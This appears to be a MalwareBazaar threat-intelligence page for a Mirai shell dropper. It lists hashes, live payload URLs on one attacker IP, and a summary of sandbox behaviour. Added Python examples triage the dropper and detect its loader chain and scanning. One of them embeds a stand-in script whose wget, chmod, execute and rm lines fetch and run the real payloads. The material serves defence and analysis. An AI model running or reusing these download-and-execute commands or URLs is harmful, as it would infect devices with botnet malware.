MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 6

SHA256 hash: da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2
SHA3-384 hash: 73f6732d4ed0cd83aa06dd233b0f2b87effe55f693abeb077c5782e05863e9abd71612397e4d5348adb64c8f2aad044a
SHA1 hash: ed0fe873b18ecf1a4eafd2d6c8c3910aa972bd69
MD5 hash: a33eba147806dfdcbdbc30e17b9de982
humanhash: johnny-lactose-victor-cat
File name: wget.sh
Signature: Mirai
File size: 1,086 bytes
First seen: 2025-11-11 23:42:35 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 12:Aq+5oaL+5WNIQQA+57vK2H+5tKA+5bH+5q+5g5+5oH+5IcA+5u3A+5JzAUv:aNI5KmTdBV5dv
TLSH: T106113AF91015512A12086F11706A09396EFBF7E2A0359EF454BFE42361CB5D07726F7B
Magika: txt
Reporter: abuse_ch
Tags: sh
IOCs

URL | Malware sample (SHA256 hash) | Signature | Tags
http://213.209.143.62/UnHAnaAW.arm | 22902a825f4b5e45d050e75fd997518f670dcc1ed147719e025a97334e1fcd91 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.arm5 | 4bab044accc55cd8b091514d74bfb44eaaea95272ee653e93948925e24b25c7a | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.arm6 | 9f32df4b92beb06bfed9f04284c434379715cfcba0a62fa6bd568928c146dfd4 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.arm7 | 51bb3572999cd4a4b25fd0cc06b061674df3373767c789ceff16b677a2e4bdc5 | Mirai | arm elf geofenced mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.sh4 | 139cf5e5c3b4a3175dfda683eaefe4e6bd5310afa3d6d679363a224a6c69feea | Mirai | elf geofenced mirai opendir SuperH ua-wget USA
http://213.209.143.62/UnHAnaAW.ppc | 74e244774df73843123066181b2bb2ee1b7a62fedc22e6e936adc6e21307e42c | Mirai | elf geofenced mirai opendir PowerPC ua-wget USA
http://213.209.143.62/UnHAnaAW.mips | 1aeffd0f72ac38ac1af0f86a925957eb88cff0184d6628b48ee9f452dcf8ce9c | Mirai | elf geofenced mips mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.mpsl | f91fa8a4c5e27570471adaa1d53a68ad32a4c38f8f9f12d74bbf5614b3baaf14 | Mirai | elf geofenced mips mirai opendir ua-wget USA
http://213.209.143.62/UnHAnaAW.spc | b19d8245d8adeb27944deefd2ae7662e4bda0c3098c964e94b5326acbec78755 | Mirai | elf geofenced mirai opendir sparc ua-wget USA
http://213.209.143.62/UnHAnaAW.x86 | 42efa473fa16cd174a1394892b7163f4e47c0434d1138d120135451514465617 | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://213.209.143.62/UnHAnaAW.x86_64 | 5c4b64e559c1332e9f65c611909524c68ad73d63878cd6e36602c17303d0985b | Mirai | elf geofenced mirai opendir ua-wget USA x86
http://213.209.143.62/UnHAnaAW.i586 | n/a | n/a | elf

All twelve payloads are served from one open directory on 213.209.143.62, one ELF build per target architecture (the suffix names the architecture); the i586 build had no sample in the database when this entry was listed.
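Static triage of a dropper with this shape, as an added example (it is not the sample script, which MalwareBazaar does not reproduce on this page): the DROPPER string below is a constructed stand-in whose URLs follow the IOC table above, and the helpers extract_urls, arch_from_name, rm_targets and triage are this example's own. It pulls out every download URL, classifies each payload by the Mirai-style architecture suffix, and checks that the download, chmod, execute and delete stages are all present.

```python
"""Static triage of a Mirai-style wget.sh dropper (added example, not the
sample's own code, which MalwareBazaar does not reproduce on this page).
DROPPER is a constructed stand-in: the URLs mirror the IOC table for this
sample, the surrounding shell is assumed."""
from __future__ import annotations

import re
from urllib.parse import urlparse

DROPPER = r"""
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://213.209.143.62/UnHAnaAW.x86; chmod +x UnHAnaAW.x86; ./UnHAnaAW.x86
wget http://213.209.143.62/UnHAnaAW.x86_64; chmod +x UnHAnaAW.x86_64; ./UnHAnaAW.x86_64
wget http://213.209.143.62/UnHAnaAW.mips; chmod +x UnHAnaAW.mips; ./UnHAnaAW.mips
wget http://213.209.143.62/UnHAnaAW.mpsl; chmod +x UnHAnaAW.mpsl; ./UnHAnaAW.mpsl
wget http://213.209.143.62/UnHAnaAW.arm7; chmod +x UnHAnaAW.arm7; ./UnHAnaAW.arm7
wget http://213.209.143.62/UnHAnaAW.sh4; chmod +x UnHAnaAW.sh4; ./UnHAnaAW.sh4
rm -rf UnHAnaAW.x86 UnHAnaAW.x86_64 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.arm7 UnHAnaAW.sh4
"""

URL_RE = re.compile(r"""https?://[^\s;'"|&<>]+""")
# chmod +x <file> or chmod 777 <file>
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+([^\s;]+)")
# "./file" or "sh file" at the start of a command
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)(?:\./|sh\s+)([^\s;]+)", re.M)
# everything after "rm" up to the end of the command; flags are stripped below
RM_RE = re.compile(r"\brm\s+([^;\n|&]+)")

# Suffix convention used by Mirai-family loaders, including this sample.
ARCH_SUFFIXES = {
    "x86": "x86 (32-bit)", "x86_64": "x86-64", "i586": "x86 (i586)",
    "arm": "ARM", "arm5": "ARMv5", "arm6": "ARMv6", "arm7": "ARMv7",
    "mips": "MIPS (big-endian)", "mpsl": "MIPS (little-endian)",
    "sh4": "SuperH", "ppc": "PowerPC", "spc": "SPARC",
}


def arch_from_name(filename: str) -> str:
    """Map a payload file name to its target architecture by suffix."""
    suffix = filename.rsplit(".", 1)[-1].lower()
    return ARCH_SUFFIXES.get(suffix, "unknown")


def extract_urls(script: str) -> list[str]:
    """Unique download URLs in order of first appearance."""
    urls: list[str] = []
    for m in URL_RE.finditer(script):
        if m.group(0) not in urls:
            urls.append(m.group(0))
    return urls


def rm_targets(script: str) -> set[str]:
    """File names passed to rm, with option flags dropped."""
    targets: set[str] = set()
    for m in RM_RE.finditer(script):
        targets.update(t for t in m.group(1).split() if not t.startswith("-"))
    return targets


def triage(script: str) -> dict:
    """Hosts, per-architecture payloads and which loader stages are present."""
    urls = extract_urls(script)
    payloads = []
    for u in urls:
        name = urlparse(u).path.rsplit("/", 1)[-1]
        payloads.append({"url": u, "file": name, "arch": arch_from_name(name)})
    chmod = set(CHMOD_RE.findall(script))
    executed = set(EXEC_RE.findall(script))
    removed = rm_targets(script)
    return {
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "payloads": payloads,
        "stages": {
            "download": bool(urls),
            "chmod": bool(chmod),
            "execute": bool(executed),
            "cleanup": bool(removed),
        },
        # payloads that were run and then deleted: the anti-forensics pattern
        "executed_and_removed": sorted(executed & removed),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(DROPPER), indent=2))
```

This regex pass only handles plain loaders that issue one wget/chmod/exec command per payload, as modelled here; droppers that assemble the URL from shell variables, or that fetch a second-stage script instead of the binaries directly, need the script run in a sandbox (as the vendor graph further down shows for this sample) rather than parsed.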

Intelligence

File Origin
# of uploads: 1
# of downloads: 49
Origin country: DE

Vendor Threat Intelligence

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: mirai

Verdict: Malicious
File Type: ps1
First seen: 2025-11-12 00:20:00 UTC
Last seen: 2025-11-12 00:37:00 UTC
Hits: ~10
Status: terminated
Behavior Graph (process tree and network activity, summarised from the rendered graph):

/usr/bin/sudo (pid 3523)
  execve -> /tmp/sample.bin (pid 3525), the script under analysis, which in turn ran:
    12 x execve -> /usr/bin/wget (net, send-data, write-file): one HTTP request of 141-144 bytes each to 213.209.143.62:80, one fetch per payload in the IOC table
    12 x execve -> /usr/bin/chmod
    11 x clone -> /usr/bin/dash (a subshell per payload)
    execve -> /home/sandbox/UnHAnaAW.x86 (pid 3704, net): the only fetched payload that executed in this sandbox
    execve -> /usr/bin/rm (pid 3767, delete-file) after the loop
/home/sandbox/UnHAnaAW.x86 (pid 3704)
  resolves via 8.8.8.8:53 (the scanner workers below do the same)
  clone -> pids 3706, 3707, 3708
  pid 3708 (net, send-data, zombie): sends 16 B to 213.209.143.62:1024 (the download host on a second port, consistent with a C2 check-in), then clones workers 3710-3715
  pid 3713 (net, send-data): sends 12 B to 213.209.143.62:1024, clones 5317 and 5318
  pid 3706 -> 5319, 5320; pid 5320 connects to 213.209.143.62:1024 and clones workers 5321-5326; pid 5324 connects to 213.209.143.62:1024 and clones 5327, 5328
  scanner workers (3710, 3711, 3712, 3715, 5318, 5321, 5322, 5323, 5326, 5328; tagged net, net-scan, send-data) each send to 4,095-4,097 distinct IP addresses; destinations sampled in the graph:
    port 23: 38.181.157.173 (40 B), 187.102.200.58
    port 80: 95.155.36.125 (40 B), 88.99.113.28, 88.221.130.53, 88.149.130.8
    port 8080: 31.33.136.150 (353 B), 94.20.46.15 (353 B)
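The loader chain and scanner fan-out in the graph above, as detection logic over a constructed event stream (added example, not the sandbox vendor's code): the Event record, the PIDs that echo the graph, the TEST-NET scan targets in 203.0.113.0/24 and the functions loader_chains, scan_fanout and c2_candidates are all this example's own.

```python
"""Detection logic for the loader chain and scanner fan-out shown in the
behaviour graph above (added example, not the sandbox vendor's code). The
event stream is constructed: PIDs and the process shape follow the graph,
scan targets in 203.0.113.0/24 are TEST-NET placeholders."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str      # executable of the process the event belongs to
    op: str         # "execve" or "connect"
    dst: str = ""   # "ip:port" for connect events


DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
WRITABLE = ("/tmp", "/var/tmp", "/var/run", "/dev/shm", "/home", "/mnt")
SCAN_PORTS = {23, 80, 8080}   # ports the scanner workers hit in the graph


def build_events() -> list[Event]:
    """Constructed stream modelled on the graph: sample.bin (3525) runs
    wget -> chmod -> the fetched x86 binary -> rm; the binary resolves DNS,
    checks in to 213.209.143.62:1024 and spawns a worker that scans."""
    ev = [
        Event(3525, 3523, "/tmp/sample.bin", "execve"),
        Event(3526, 3525, "/usr/bin/wget", "execve"),
        Event(3526, 3525, "/usr/bin/wget", "connect", "213.209.143.62:80"),
        Event(3541, 3525, "/usr/bin/chmod", "execve"),
        Event(3704, 3525, "/home/sandbox/UnHAnaAW.x86", "execve"),
        Event(3704, 3525, "/home/sandbox/UnHAnaAW.x86", "connect", "8.8.8.8:53"),
        Event(3708, 3704, "/home/sandbox/UnHAnaAW.x86", "connect", "213.209.143.62:1024"),
        Event(3767, 3525, "/usr/bin/rm", "execve"),
    ]
    for i in range(24):   # one worker, 24 distinct targets across 23/80/8080
        port = (23, 80, 8080)[i % 3]
        ev.append(Event(3710, 3708, "/home/sandbox/UnHAnaAW.x86", "connect",
                        f"203.0.113.{i + 1}:{port}"))
    return ev


def loader_chains(events: list[Event]) -> list[int]:
    """Parent PIDs that execve'd downloader -> chmod -> a binary under a
    writable path -> rm, in that order: the wget.sh loop seen from outside."""
    by_parent: dict[int, list[str]] = defaultdict(list)
    for e in events:
        if e.op == "execve":
            by_parent[e.ppid].append(e.image)
    hits = []
    for ppid, images in by_parent.items():
        stage = 0
        for img in images:
            base = img.rsplit("/", 1)[-1]
            if stage == 0 and base in DOWNLOADERS:
                stage = 1
            elif stage == 1 and base == "chmod":
                stage = 2
            elif stage == 2 and img.startswith(WRITABLE):
                stage = 3
            elif stage == 3 and base == "rm":
                stage = 4
                break
        if stage == 4:
            hits.append(ppid)
    return hits


def scan_fanout(events: list[Event], threshold: int = 16) -> dict[int, int]:
    """PIDs that connected to at least `threshold` distinct IPs on scan ports."""
    targets: dict[int, set[str]] = defaultdict(set)
    for e in events:
        if e.op == "connect":
            ip, port = e.dst.rsplit(":", 1)
            if int(port) in SCAN_PORTS:
                targets[e.pid].add(ip)
    return {pid: len(ips) for pid, ips in targets.items() if len(ips) >= threshold}


def c2_candidates(events: list[Event]) -> set[str]:
    """Destinations of binaries running from writable paths that are neither
    DNS nor scan-port traffic; in the graph this is 213.209.143.62:1024."""
    out = set()
    for e in events:
        if e.op != "connect" or not e.image.startswith(WRITABLE):
            continue
        port = int(e.dst.rsplit(":", 1)[1])
        if port != 53 and port not in SCAN_PORTS:
            out.add(e.dst)
    return out


if __name__ == "__main__":
    ev = build_events()
    print("loader chains:", loader_chains(ev))
    print("scanners:", scan_fanout(ev))
    print("C2 candidates:", c2_candidates(ev))
```

The fan-out threshold of 16 is an arbitrary choice for the constructed data; in the real run each worker reached about 4,097 addresses, so any threshold in the tens separates scanning from ordinary client traffic. Note that the C2 port and the payload server share one IP here, so a block on 213.209.143.62 alone covers both stages for this sample, which is not true of Mirai variants that split the two hosts.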
Threat name: Script-Shell.Trojan.Heuristic
Status: Malicious
First seen: 2025-11-11 23:43:15 UTC
File Type: Text
AV detection: 14 of 36 (38.89%)
Threat level: 2/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
These three behaviours are Windows-specific (registry, SetWindowsHookEx) and cannot be produced by a POSIX shell script such as wget.sh; treat this vendor's result as noise for this sample rather than as observed behaviour.
Please note that we are no longer able to provide a coverage score for Virus Total.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: Mirai
File type: sh
SHA256: da11d8fe0808f7715d9643ccea634cf56f54a0a766468c7deaa2650174a821f2 (this sample)
